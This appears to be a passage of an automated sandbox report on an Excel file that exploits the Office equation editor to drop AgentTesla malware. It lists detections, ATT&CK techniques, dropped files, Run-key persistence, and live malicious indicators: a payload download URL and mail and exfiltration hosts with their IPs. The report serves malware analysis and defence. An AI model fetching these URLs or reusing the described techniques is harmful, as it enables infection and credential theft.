                      Source: Yara matchFile source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder1Process Injection112Obfuscated Files or Information21LSASS MemorySystem Information Discovery114Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Scheduled Task/Job1Software Packing12Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job1Logon Script (Mac)Registry Run Keys / Startup Folder1Extra Window Memory Injection1NTDSSecurity Software Discovery311Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 452692 Sample: Doc2.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 55 Found malware configuration 2->55 57 Antivirus detection for URL or domain 2->57 59 Multi AV Scanner detection for dropped file 2->59 61 14 other signatures 2->61 7 EQNEDT32.EXE 12 2->7         started        12 MLdAu.exe 2 2->12         started        14 MLdAu.exe 2 2->14         started        16 EXCEL.EXE 34 36 2->16         started        process3 dnsIp4 49 arkemagrup.com 185.26.106.165, 49165, 80 ATE-ASFR France 7->49 41 C:\Users\user\...\Doc_87654334567[1].exe, PE32 7->41 dropped 43 C:\Users\Public\vbc.exe, PE32 7->43 dropped 71 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->71 18 vbc.exe 3 7->18         started        73 Multi AV Scanner detection for dropped file 12->73 75 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->75 77 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 12->77 22 schtasks.exe 12->22         started        24 MLdAu.exe 12->24         started        79 Injects a PE file into a foreign processes 14->79 26 schtasks.exe 14->26         started        28 MLdAu.exe 14->28         started        45 C:\Users\user\Desktop\~$Doc2.xlsx, data 16->45 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\...\WzyRXCWtdGSdEA.exe, PE32 18->37 dropped 39 C:\Users\user\AppData\Local\...\tmpB2BC.tmp, XML 18->39 dropped 63 Multi AV Scanner detection for dropped file 18->63 65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->65 67 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->67 69 2 other signatures 18->69 30 vbc.exe 1 6 18->30         started        35 schtasks.exe 18->35         started        signatures9 process10 dnsIp11 51 mail.spamora.net 185.26.106.194, 49166, 49167, 49169 ATE-ASFR France 30->51 47 C:\Users\user\AppData\Roaming\...\MLdAu.exe, PE32 30->47 dropped 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->53 file12 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Doc2.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\Public\vbc.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      18.2.MLdAu.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      17.2.MLdAu.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      9.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://arkemagrup.com/Doc_87654334567.exe100%Avira URL Cloudmalware
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.sectigo.com0%0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://mail.spamora.net0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://BGwprh.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.spamora.net
                      185.26.106.194
                      truetrue
                        unknown
                        arkemagrup.com
                        185.26.106.165
                        truetrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://arkemagrup.com/Doc_87654334567.exetrue
                          • Avira URL Cloud: malware
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://127.0.0.1:HTTP/1.1vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://DynDns.comDynDNSvbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://sectigo.com/CPS0vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://crl.entrust.net/server1.crl0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://ocsp.entrust.net03vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.diginotar.nl/cps/pkioverheid0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://login.blockchain.com/ObjectLengthChainingModeGCMAuthTagLengthChainingModeKeyDataBlobAESMicrovbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                              high
                              http://ocsp.sectigo.com0%vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmpfalse
                                high
                                https://login.blockchain.com/HD?mvbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                                  high
                                  https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://mail.spamora.netvbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.%s.comPAvbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://ocsp.entrust.net0Dvbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://BGwprh.comvbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpfalse
                                    high
                                    https://secure.comodo.com/CPS0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                                      high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://servername/isapibackend.dllvbc.exe, 00000009.00000002.2382948268.0000000008610000.00000002.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://crl.entrust.net/2048ca.crl0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                                        high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        185.26.106.194
                                        mail.spamora.netFrance
                                        24935ATE-ASFRtrue
                                        185.26.106.165
                                        arkemagrup.comFrance
                                        24935ATE-ASFRtrue

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:452692
                                        Start date:22.07.2021
                                        Start time:18:11:08
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 5s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:Doc2.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:17
                                        Number of new started drivers analysed:2
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@18/28@7/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 0.2% (good quality ratio 0%)
                                        • Quality average: 0%
                                        • Quality standard deviation: 0%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 284
                                        • Number of non-executed functions: 23
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .xlsx
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, WmiPrvSE.exe
                                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 13.107.4.50
                                        • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, Edge-Prod-FRA.env.au.au-msedge.net, wu.azureedge.net, afdap.au.au-msedge.net, au.au-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, au.c-0001.c-msedge.net, elasticShed.au.au-msedge.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:12:08API Interceptor52x Sleep call for process: EQNEDT32.EXE modified
                                        18:12:10API Interceptor967x Sleep call for process: vbc.exe modified
                                        18:12:45API Interceptor4x Sleep call for process: schtasks.exe modified
                                        18:13:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MLdAu C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                        18:13:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MLdAu C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                        18:13:14API Interceptor529x Sleep call for process: MLdAu.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        185.26.106.194Doc_347343.xlsxGet hashmaliciousBrowse
                                          5nXX3v5zWn.exeGet hashmaliciousBrowse
                                            Doc_386384934.xlsxGet hashmaliciousBrowse
                                              Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                pfI78aQqmv.exeGet hashmaliciousBrowse
                                                  Inquiry.xlsxGet hashmaliciousBrowse
                                                    Doc_87654334567.exeGet hashmaliciousBrowse
                                                      PO-4600017931.xlsxGet hashmaliciousBrowse
                                                        HTOj2DnVlw.exeGet hashmaliciousBrowse
                                                          i7Qs22QuKz.exeGet hashmaliciousBrowse
                                                            Doc.xlsxGet hashmaliciousBrowse
                                                              Doc_3956385638364836437638364738365483647383648373638463836483648363846383.exeGet hashmaliciousBrowse
                                                                Doc_987945678.exeGet hashmaliciousBrowse
                                                                  Ref-2021-05-14.exeGet hashmaliciousBrowse
                                                                    Doc_38464856384683648364.exeGet hashmaliciousBrowse
                                                                      Document_printout_copy_34853936483648364393743836384.exeGet hashmaliciousBrowse
                                                                        DHL_SHIPMENT_ADDRESS_4495749574946596484658458458,pdf.exeGet hashmaliciousBrowse
                                                                          RFQ_38463846393646388368364834.exeGet hashmaliciousBrowse
                                                                            Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                              9385839583309483484303843094034.exeGet hashmaliciousBrowse
                                                                                185.26.106.165Doc_347343.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                DOCUMENT_395849584954.exeGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/Host_00.exe
                                                                                Order_364537463746347485945454.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Specification.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Doc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Documents.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Documents.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                PO0495858558585_JAN2021.xlsxGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/file1.exe
                                                                                Order_00009.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                PO85937758859777.xlsxGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/file1.exe
                                                                                Order_385647584.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Order_385647584.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                PO890299700006.xlsxGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/file1.exe
                                                                                Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                PO 24000109490.xlsxGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/file1.exe

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                mail.spamora.netDoc_347343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                8WJ8enHgoR.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                5nXX3v5zWn.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                pfI78aQqmv.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_87654334567.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                HTOj2DnVlw.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                i7Qs22QuKz.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_3956385638364836437638364738365483647383648373638463836483648363846383.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_987945678.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Ref-2021-05-14.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_38464856384683648364.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Document_printout_copy_34853936483648364393743836384.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DHL_SHIPMENT_ADDRESS_4495749574946596484658458458,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                RFQ_38463846393646388368364834.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                arkemagrup.comDoc_347343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                ATE-ASFRDoc_347343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                5nXX3v5zWn.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                pfI78aQqmv.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_87654334567.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                HTOj2DnVlw.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                i7Qs22QuKz.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_3956385638364836437638364738365483647383648373638463836483648363846383.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_987945678.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Ref-2021-05-14.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_38464856384683648364.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Document_printout_copy_34853936483648364393743836384.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
